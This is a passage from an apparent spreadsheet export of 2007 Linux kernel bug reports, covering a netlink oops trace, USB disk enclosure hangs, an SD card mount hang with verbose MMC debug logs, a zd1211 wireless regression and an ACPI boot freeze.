0068:dee05c80 Aug 29 23:43:53 bowl kernel: [350485.790485] at virtual address 00000054 Aug 29 23:43:53 bowl kernel: [350485.790557] printing eip: Aug 29 23:43:53 bowl kernel: [350485.790613] c03318ae Aug 29 23:43:53 bowl kernel: [350485.790665] *pde = 00000000 Aug 29 23:43:53 bowl kernel: [350485.790727] Oops: 0000 [#4] Aug 29 23:43:53 bowl kernel: [350485.790779] PREEMPT SMP Aug 29 23:43:53 bowl kernel: [350485.790907] Modules linked in: w83627hf hwmon_vid i2c_isa Aug 29 23:43:53 bowl kernel: [350485.791103] CPU: 1 Aug 29 23:43:53 bowl kernel: [350485.791104] EIP: 0060:[&lt;c03318ae&gt;] Not tainted VLI Aug 29 23:43:54 bowl kernel: [350485.791106] EFLAGS: 00010246 (2.6.22.3 #1) Aug 29 23:43:54 bowl kernel: [350485.791241] EIP is at netlink_rcv_skb+0xa/0x7e Aug 29 23:43:56 bowl kernel: [350485.791286] eax: 00000000 ebx: 00000000 ecx: c153a920 edx: c0398819 Aug 29 23:43:57 bowl kernel: [350485.791336] esi: 00000000 edi: c0398819 ebp: eaa85c8c esp: eaa85c80 Aug 29 23:43:57 bowl kernel: [350485.791389] ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 Aug 29 23:43:57 bowl kernel: [350485.791441] Process oidentd (pid: 21497, ti=eaa84000 task=caca0330 task.ti=eaa84000) Aug 29 23:43:57 bowl kernel: [350485.791492] Stack: 00000000 eaa85cac f7c8ba78 eaa85ca4 c0331962 c0398819 f7c8ba00 0000004c Aug 29 23:43:57 bowl kernel: [350485.791825] f736f000 eaa85cb4 c03988e3 00000001 f7c8ba00 eaa85cc4 c03312a5 0000004c Aug 29 23:43:57 bowl kernel: [350485.792158] f7c8ba00 eaa85cd4 c0330681 f7c8ba00 e9d49180 eaa85d00 c03307c6 7fffffff Aug 29 23:43:57 bowl kernel: [350485.792491] Call Trace: Aug 29 23:43:57 bowl kernel: [350485.792572] [&lt;c010361a&gt;] show_trace_log_lvl+0x1c/0x33 Aug 29 23:43:57 bowl kernel: [350485.792653] [&lt;c01036d4&gt;] show_stack_log_lvl+0x8d/0xaa Aug 29 23:43:57 bowl kernel: [350485.792731] [&lt;c010390e&gt;] show_registers+0x1cb/0x321 Aug 29 23:43:58 bowl kernel: [350485.792808] [&lt;c0103bff&gt;] die+0x112/0x1e1 Aug 29 23:43:58 bowl kernel: [350485.792885] [&lt;c01132d2&gt;] do_page_fault+0x229/0x565 Aug 29 23:43:58 bowl kernel: [350485.792963] [&lt;c03c8d3a&gt;] error_code+0x72/0x78 Aug 29 23:43:58 bowl kernel: [350485.793043] [&lt;c0331962&gt;] netlink_run_queue+0x40/0x76 Aug 29 23:43:58 bowl kernel: [350485.793123] [&lt;c03988e3&gt;] inet_diag_rcv+0x1f/0x2c Aug 29 23:43:58 bowl kernel: [350485.793208] [&lt;c03312a5&gt;] netlink_data_ready+0x57/0x59 Aug 29 23:43:58 bowl kernel: [350485.793290] [&lt;c0330681&gt;] netlink_sendskb+0x24/0x45 Aug 29 23:43:58 bowl kernel: [350485.793373] [&lt;c03307c6&gt;] netlink_unicast+0x100/0x116 Aug 29 23:43:59 bowl kernel: [350485.793455] [&lt;c0330f83&gt;] netlink_sendmsg+0x1c2/0x280 Aug 29 23:43:59 bowl kernel: [350485.793538] [&lt;c02fcce9&gt;] sock_sendmsg+0xba/0xd5 Aug 29 23:43:59 bowl kernel: [350485.793641] [&lt;c02fe4d1&gt;] sys_sendmsg+0x17b/0x1e8 Aug 29 23:43:59 bowl kernel: [350485.793732] [&lt;c02fe92d&gt;] sys_socketcall+0x230/0x24d Aug 29 23:43:59 bowl kernel: [350485.793822] [&lt;c01028d2&gt;] syscall_call+0x7/0xb Aug 29 23:44:00 bowl kernel: [350485.793919] ======================= Aug 29 23:44:00 bowl kernel: [350485.793964] Code: f0 ff 4e 18 0f 94 c0 84 c0 0f 84 66 ff ff ff 89 f0 e8 86 e2 fc ff e9 5a ff ff ff f0 ff 40 10 eb be 55 89 e5 57 89 d7 56 89 c6 53 &lt;8b&gt; 50 54 83 fa 10 72 55 8b 9e 9c 00 00 00 31 c9 8b 03 83 f8 0f Aug 29 23:44:00 bowl kernel: [350485.796458] EIP: [&lt;c03318ae&gt;] netlink_rcv_skb+0xa/0x7e SS:ESP 0068:eaa85c80</t>
  </si>
  <si>
    <t>One broken USB storage device can hang the entire USB subsystem</t>
  </si>
  <si>
    <t>2.6.22.6</t>
  </si>
  <si>
    <t>2007-09-02 14:07 UTC</t>
  </si>
  <si>
    <t>Alain Knaff</t>
  </si>
  <si>
    <t>2008-05-09 02:41 UTC</t>
  </si>
  <si>
    <t>I have several Sharkoon external disk enclosures. One contains an IDE (parallel) disk with some bad sectors. The other contains a good (as far as I know...) SATA disk. With the IDE disk, If I attempt to read files containing the bad sectors, the process hangs forever, in an unkillable state. With the SATA disk (new, and never fell =&gt; no reason to believe it is bad), it fails randomly after some heavy copying (rsyncing a huge tree from the external disk towards my internal disk), at different places on each try. But like with the IDE disk, the process will hang forever, in an unkillable state, and the drive's light turns green (red with Ubuntu kernel 2.6.22-10-generic). In both cases (IDE and SATA), a sync started in another window will also hang forever (even if the first process did only read from the disk). Attempting to remove the ohci_hcd or ehci_hcd will just cause that rmmod process to hang as well. Lsusb will hang likewise. But strangely enough, my usb mouse still works, as do my usb speakers. With the IDE disk, a reboot solves the issue (until I attempt read those bad sectors again), even without powercycling the disk. IMHO, these Sharkoon enclosures do have issues, but should the kernel really handle the situation so badly? Shouldn't there be a timeout where the processes will just get an I/O error, but the rest of the system can continue using USB? Interestingly enough, the problem doesn't occur (or occurs much less often) if I throttle rsync's bandwith using the --bwlimit option (if I throttle bw to 5 Megabytes/s, the problem almost never happens. The enclosure+disk is capable of 30 Megabyte/s though) Most recent kernel where this bug did not occur: don't known for sure. However, on my old SuSE box (having 2.6.13-15.16) it does work all right. Distribution: Kubuntu Gutsy Hardware Environment: Sharkoon Swift-Case SATA/USB2.0 3.5" http://www.computeruniverse.net/info.asp?id=90205832 Western Digital WD2500JS 250GB http://www.computeruniverse.net/info.asp?id=90143746 or, for the IDE variant: Sharkoon Swift-Case USB2.0 3.5" http://www.computeruniverse.net/info.asp?id=90150304 MAXTOR 6L080J4 In both cases, with an ASUS M2A-VM, Sockel AM2, mATX motherboard http://www.computeruniverse.net/info.asp?id=90216021 (in case it is relevant due to the USB controller?) Software Environment: n.a. Problem Description: A copy from the affected device will hang in D (diskio) state, and is unkillable Steps to reproduce: rsync -uav /media/usbdisk /tmp (For the IDE variant: knock over the drive while in operation or otherwise create damaged sectors...)</t>
  </si>
  <si>
    <t>mmc/sd device hangs on access</t>
  </si>
  <si>
    <t>2007-09-02 16:04 UTC</t>
  </si>
  <si>
    <t>Marco Costa</t>
  </si>
  <si>
    <t>2007-09-20 00:31 UTC</t>
  </si>
  <si>
    <t>Nicolas Ferre</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12 Distribution: None Hardware Environment: Taskit Portux 920T Software Environment: Busybox with mdev enabled Problem Description: On mounting the SD card, the device blocks, mount cannot be killed. SD card works fine on other system and even on the same system with kernel 2.6.12. Tried kernel 2.6.21, the blocking happens at random. Sometimes the mount is successful, but reading fails. ps output: PID Uid VSZ Stat Command 1 root 2960 S init 2 root SW&lt; [kthreadd] 3 root SWN [ksoftirqd/0] 4 root SW&lt; [events/0] 5 root SW&lt; [khelper] 24 root SW&lt; [kblockd/0] 27 root SW&lt; [khubd] 40 root SW [pdflush] 41 root SW [pdflush] 42 root SW&lt; [kswapd0] 43 root SW&lt; [aio/0] 74 root SW&lt; [mtdblockd] 92 root SW&lt; [kmmcd] 104 root DW&lt; [mmcqd] 109 root 2964 S -sh 114 root 2964 D mount /dev/mmcblk0p1 x dmesg output before mount attempt: mmc0: clock 0Hz busmode 1 powermode 0 cs 0 Vdd 0 width 0 timing 0 MMC: Setting controller bus width to 1 Added MCI driver mmc0: clock 0Hz busmode 1 powermode 1 cs 0 Vdd 21 width 0 timing 0 MMC: Setting controller bus width to 1 mmc0: clock 375000Hz busmode 1 powermode 2 cs 0 Vdd 21 width 0 timing 0 clkdiv = 79. mcck = 374400 MMC: Setting controller bus width to 1 mmc0: clock 375000Hz busmode 1 powermode 2 cs 1 Vdd 21 width 0 timing 0 clkdiv = 79. mcck = 374400 MMC: Setting controller bus width to 1 mmc0: starting CMD0 arg 00000000 flags 00000040 Sending command 0 as 00000800, arg = 00000000, blocks = 0, length = 0 (MR = 0000 834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000000 00000000 00000000 00000000] mmc0: req done (CMD0): 0/0/0: 00000000 00000000 00000000 00000000 mmc0: clock 375000Hz busmode 1 powermode 2 cs 0 Vdd 21 width 0 timing 0 clkdiv = 79. mcck = 374400 MMC: Setting controller bus width to 1 mmc0: starting CMD8 arg 000001aa flags 00000075 Sending command 8 as 00001848, arg = 000001AA, blocks = 0, length = 0 (MR = 0000 834F) setting ier to 00000001 MCI irq: status = 0010C0E4, C07F0001, 00100000 MMC: Response timeout Completed command Status = 0010C0E5 [00000000 00000000 00000000 00000000] Error detected and set to 1 (cmd = 8, retries = 0) mmc0: req done (CMD8): 1/0/0: 00000000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00400120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00400120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00000000 flags 00000061 Sending command 41 as 00001869, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: clock 375000Hz busmode 1 powermode 2 cs 0 Vdd 20 width 0 timing 0 clkdiv = 79. mcck = 374400 MMC: Setting controller bus width to 1 mmc0: clock 375000Hz busmode 1 powermode 2 cs 1 Vdd 20 width 0 timing 0 clkdiv = 79. mcck = 374400 MMC: Setting controller bus width to 1 mmc0: starting CMD0 arg 00000000 flags 00000040 Sending command 0 as 00000800, arg = 00000000, blocks = 0, length = 0 (MR = 0000 834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD0): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: clock 375000Hz busmode 1 powermode 2 cs 0 Vdd 20 width 0 timing 0 clkdiv = 79. mcck = 374400 MMC: Setting controller bus width to 1 mmc0: starting CMD8 arg 000001aa flags 00000075 Sending command 8 as 00001848, arg = 000001AA, blocks = 0, length = 0 (MR = 0000 834F) setting ier to 00000001 MCI irq: status = 0010C0E4, C07F0001, 00100000 MMC: Response timeout Completed command Status = 0010C0E5 [00FF8000 00000000 00000000 00000000] Error detected and set to 1 (cmd = 8, retries = 0) mmc0: req done (CMD8): 1/0/0: 00ff8000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00400120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00400120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00300000 flags 00000061 Sending command 41 as 00001869, arg = 00300000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00000120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00300000 flags 00000061 Sending command 41 as 00001869, arg = 00300000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00000120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00300000 flags 00000061 Sending command 41 as 00001869, arg = 00300000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00000120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00300000 flags 00000061 Sending command 41 as 00001869, arg = 00300000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00000120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00300000 flags 00000061 Sending command 41 as 00001869, arg = 00300000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00000120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00300000 flags 00000061 Sending command 41 as 00001869, arg = 00300000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00000120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00300000 flags 00000061 Sending command 41 as 00001869, arg = 00300000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00000120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00300000 flags 00000061 Sending command 41 as 00001869, arg = 00300000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [00FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 00ff8000 00000000 00000000 00000000 mmc0: starting CMD55 arg 00000000 flags 00000075 Sending command 55 as 00001877, arg = 00000000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000120 00000000 00000000 00000000] mmc0: req done (CMD55): 0/0/0: 00000120 00000000 00000000 00000000 mmc0: starting CMD41 arg 00300000 flags 00000061 Sending command 41 as 00001869, arg = 00300000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0004C0E4, C07F0001, 00040000 MMC: Response CRC error Completed command Status = 0004C0E5 [80FF8000 00000000 00000000 00000000] mmc0: req done (CMD41): 0/0/0: 80ff8000 00000000 00000000 00000000 mmc0: starting CMD2 arg 00000000 flags 00000067 Sending command 2 as 00001882, arg = 00000000, blocks = 0, length = 0 (MR = 0000 834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [02544D53 44303147 2894C0B0 350073B5] mmc0: req done (CMD2): 0/0/0: 02544d53 44303147 2894c0b0 350073b5 mmc0: starting CMD3 arg 00000000 flags 00000075 Sending command 3 as 00001843, arg = 00000000, blocks = 0, length = 0 (MR = 0000 834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [6DDA0520 44303147 2894C0B0 350073B5] mmc0: req done (CMD3): 0/0/0: 6dda0520 44303147 2894c0b0 350073b5 mmc0: clock 375000Hz busmode 2 powermode 2 cs 0 Vdd 20 width 0 timing 0 clkdiv = 79. mcck = 374400 MMC: Setting controller bus width to 1 mmc0: starting CMD9 arg 6dda0000 flags 00000007 Sending command 9 as 00001089, arg = 6DDA0000, blocks = 0, length = 0 (MR = 0000 834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [002D0032 5B5983D6 7EFBFF80 164000FB] mmc0: req done (CMD9): 0/0/0: 002d0032 5b5983d6 7efbff80 164000fb mmc0: starting CMD7 arg 6dda0000 flags 00000015 Sending command 7 as 00001047, arg = 6DDA0000, blocks = 0, length = 0 (MR = 0000 834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000700 5B5983D6 7EFBFF80 164000FB] mmc0: req done (CMD7): 0/0/0: 00000700 5b5983d6 7efbff80 164000fb mmc0: starting CMD55 arg 6dda0000 flags 00000015 Sending command 55 as 00001077, arg = 6DDA0000, blocks = 0, length = 0 (MR = 000 0834F) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000920 5B5983D6 7EFBFF80 164000FB] mmc0: req done (CMD55): 0/0/0: 00000920 5b5983d6 7efbff80 164000fb mmc0: starting CMD51 arg 00000000 flags 00000035 Sending command 51 as 00051073, arg = 00000000, blocks = 1, length = 8 (MR = 000 0834F) pre dma read Using transfer index 0 sg = c1507e44 dma address = 21502968, length = 8 Nothing left to transfer (index = 1) pre dma read done setting ier to 00000040 MCI irq: status = 0000C0D5, C07F0040, 00000040 Receive has ended post dma read finishing index 0 Unmapping page 21502968 buffer = c1502968, length = 8 post dma read done MCI irq: status = 0000C0ED, C07F4000, 00004000 RX buffer full MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000920 01A50000 16020202 164000FB] mmc0: req done (CMD51): 0/0/0: 00000920 01a50000 16020202 164000fb mmc0: starting CMD6 arg 00fffff1 flags 00000035 Sending command 6 as 00051046, arg = 00FFFFF1, blocks = 1, length = 64 (MR = 000 8834F) pre dma read Using transfer index 0 sg = c1507e44 dma address = 2151C8E0, length = 64 Nothing left to transfer (index = 1) pre dma read done setting ier to 00000040 MCI irq: status = 0000C0ED, C07F0040, 00000040 Receive has ended post dma read finishing index 0 Unmapping page 2151C8E0 buffer = c151c8e0, length = 64 post dma read done MCI irq: status = 0000C0E5, C07F4000, 00004000 RX buffer full MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000900 00000000 00000000 00000000] mmc0: req done (CMD6): 0/0/0: 00000900 00000000 00000000 00000000 mmc0: clock 25000000Hz busmode 2 powermode 2 cs 0 Vdd 20 width 0 timing 0 clkdiv = 1. mcck = 14976000 MMC: Setting controller bus width to 1 mmc0: host does not support reading read-only switch. Assuming write-enable. mmc0: starting CMD16 arg 00000200 flags 00000015 Sending command 16 as 00001050, arg = 00000200, blocks = 0, length = 0 (MR = 004 08301) setting ier to 00000001 MCI irq: status = 0000C0E5, C07F0001, 00000001 Command ready Completed command Status = 0000C0E5 [00000900 00000000 00000000 00000000] mmc0: req done (CMD16): 0/0/0: 00000900 00000000 00000000 00000000 mmcblk0: mmc0:6dda SD01G 1006080KiB mmcblk0:&lt;7&gt;mmc0: starting CMD18 arg 00000000 flags 00000035 Sending command 18 as 000D1052, arg = 00000000, blocks = 8, length = 512 (MR = 0 0408301) pre dma read Using transfer index 0 sg = c0381b60 dma address = 2029E000, length = 4096 Nothing left to transfer (index = 1) pre dma read done setting ier to 00000040 MCI irq: status = 0000C0DF, C07F0040, 00000040 Receive has ended post dma read finishing index 0 Unmapping page 2029E000 buffer = c029e000, length = 4096 post dma read done MCI irq: status = 0000C0DF, C07F4000, 00004000 RX buffer full MCI irq: status = 0000C0D7, C07F0001, 00000001 Command ready Completed command Status = 0000C0D7 [00000900 FFFFFFFF FFFFFFFF FFFFFFFF] Sending command 12 as 0002104C, arg = 00000000, blocks = 0, length = 0 (MR = 020 08301) setting ier to 00000001 MCI irq: status = 0000C0FF, C07F0001, 00000001 Command ready Completed command Status = 0000C0F7 [00000B00 FFFFFFFF FFFFFFFF FFFFFFFF] mmc0: req done (CMD18): 0/0/0: 00000900 ffffffff ffffffff ffffffff p1 dmesg after mount attempt: mmc0: starting CMD18 arg 0001ea00 flags 00000035 Sending command 18 as 000D1052, arg = 0001EA00, blocks = 2, length = 512 (MR = 0 2008301) pre dma read Using transfer index 0 sg = c0381b60 dma address = 20329400, length = 1024 Nothing left to transfer (index = 1) pre dma read done setting ier to 00000040 MCI irq: status = 0000C0DF, C07F0040, 00000040 Receive has ended post dma read finishing index 0 Unmapping page 20329400 buffer = c0329400, length = 1024 post dma read done MCI irq: status = 0000C0D7, C07F4000, 00004000 RX buffer full MCI irq: status = 0000C0DF, C07F0001, 00000001 Command ready Completed command Status = 0000C0D7 [00000900 00000000 00000000 00000000] Sending command 12 as 0002104C, arg = 00000000, blocks = 0, length = 0 (MR = 020 08301) setting ier to 00000001 MCI irq: status = 0000C0F7, C07F0001, 00000001 Command ready Completed command Status = 0000C0F7 [00000B00 00000000 00000000 00000000] mmc0: req done (CMD18): 0/0/0: 00000900 00000000 00000000 00000000 mmc0: starting CMD18 arg 0001e600 flags 00000035 Sending command 18 as 000D1052, arg = 0001E600, blocks = 8, length = 512 (MR = 0 2008301) pre dma read Using transfer index 0 sg = c0381b60 dma address = 20329000, length = 4096 Nothing left to transfer (index = 1) pre dma read done setting ier to 00000040 MCI irq: status = 0000C0DF, C07F0040, 00000040 Receive has ended post dma read finishing index 0 Unmapping page 20329000 buffer = c0329000, length = 4096 post dma read done MCI irq: status = 0000C0DF, C07F4000, 00004000 RX buffer full MCI irq: status = 0000C0D7, C07F0001, 00000001 Command ready Completed command Status = 0000C0D7 [00000900 00000000 00000000 00000000] Sending command 12 as 0002104C, arg = 00000000, blocks = 0, length = 0 (MR = 020 08301) setting ier to 00000001 MCI irq: status = 0000C0FF, C07F0001, 00000001 Command ready Completed command Status = 0000C0F7 [00000B00 00000000 00000000 00000000] mmc0: req done (CMD18): 0/0/0: 00000900 00000000 00000000 00000000 mmc0: starting CMD18 arg 0001f600 flags 00000035 Sending command 18 as 000D1052, arg = 0001F600, blocks = 8, length = 512 (MR = 0 2008301) pre dma read Using transfer index 0 sg = c0381b60 dma address = 2032A000, length = 4096 Nothing left to transfer (index = 1) pre dma read done setting ier to 00000040 MCI irq: status = 0000C0DD, C07F0040, 00000040 Receive has ended post dma read finishing index 0 Unmapping page 2032A000 buffer = c032a000, length = 4096 post dma read done MCI irq: status = 0000C0DF, C07F4000, 00004000 RX buffer full MCI irq: status = 0000C0D7, C07F0001, 00000001 Command ready Completed command Status = 0000C0D7 [00000900 00000000 00000000 00000000] Sending command 12 as 0002104C, arg = 00000000, blocks = 0, length = 0 (MR = 020 08301) setting ier to 00000001 MCI irq: status = 0000C0EF, C07F0001, 00000001 Command ready Completed command Status = 0000C0E7 [00000B00 00000000 00000000 00000000] mmc0: req done (CMD18): 0/0/0: 00000900 00000000 00000000 00000000 mmc0: starting CMD18 arg 0005f600 flags 00000035 Sending command 18 as 000D1052, arg = 0005F600, blocks = 8, length = 512 (MR = 0 2008301) pre dma read Using transfer index 0 sg = c0381b60 dma address = 2032B000, length = 4096 Nothing left to transfer (index = 1) pre dma read done setting ier to 00000040 MCI irq: status = 0000C0DF, C07F0040, 00000040 Receive has ended post dma read finishing index 0 Unmapping page 2032B000 buffer = c032b000, length = 4096 post dma read done MCI irq: status = 0000C0DF, C07F4000, 00004000 RX buffer full MCI irq: status = 0000C0D7, C07F0001, 00000001 Command ready Completed command Status = 0000C0D7 [00000900 00000000 00000000 00000000] Sending command 12 as 0002104C, arg = 00000000, blocks = 0, length = 0 (MR = 020 08301) setting ier to 00000001 MCI irq: status = 0000C0FF, C07F0001, 00000001 Command ready Completed command Status = 0000C0F7 [00000B00 00000000 00000000 00000000] mmc0: req done (CMD18): 0/0/0: 00000900 00000000 00000000 00000000 mmc0: starting CMD25 arg 0001e600 flags 00000035 Sending command 25 as 00091059, arg = 0001E600, blocks = 8, length = 512 (MR = 0 2008301) Transmitting 4096 bytes setting ier to 00008000 MCI irq: status = 0000C0D7, C07F8000, 00008000 TX buffer empty Handling the transmit At this point, no message is generated anymore. Steps to reproduce: Mount the SD card.</t>
  </si>
  <si>
    <t>zd1211 device is no longer configured</t>
  </si>
  <si>
    <t>2007-09-03 04:58 UTC</t>
  </si>
  <si>
    <t>Oliver Neukum</t>
  </si>
  <si>
    <t>2008-09-23 13:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22 Distribution: OpenSuse Hardware Environment: x86_64 Software Environment: Problem Description: The device no longer connects to the AP when configured Steps to reproduce: Plug in and configure</t>
  </si>
  <si>
    <t>boot freeze on modprobe, 2.6.21 and later</t>
  </si>
  <si>
    <t>&gt;=2.6.21</t>
  </si>
  <si>
    <t>2007-09-03 05:49 UTC</t>
  </si>
  <si>
    <t>Christian Wiegele</t>
  </si>
  <si>
    <t>2008-01-13 23:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Getnoo Linux Hardware Environment: Intel Centrino Pro (Santa Rosa) Software Environment: Problem Description: System Freezes with ACPI enabled Steps to reproduce: Compile Kernel &gt;= 2.6.21 With ACPI Support and min. 1 Subfeature enabled (e.g. battery). I was using kernel 2.6.20-r and my system worked fine. Then i did an upgrade to 2.6.22-r6 (latest). compiling worked fine. when i tried to boot ne new kernel, my system freezed. to find out what exactly causes it, i disabled a lot of kernel-features. i found out that disabling acpi-subfeatures solves the problem. so i compiled a kernel with acpi built in and just battery as a module. the kernel did then boot fine. afer modprobe battery the system freezed again. its the same problem with any other acpi module... i had not problem with that before kernel 2.6.20.</t>
  </si>
  <si>
    <t>Problem with DMA on FlashCard</t>
  </si>
  <si>
    <t>2007-09-03 08:17 UTC</t>
  </si>
  <si>
    <t>2008-07-21 03:37 UTC</t>
  </si>
  <si>
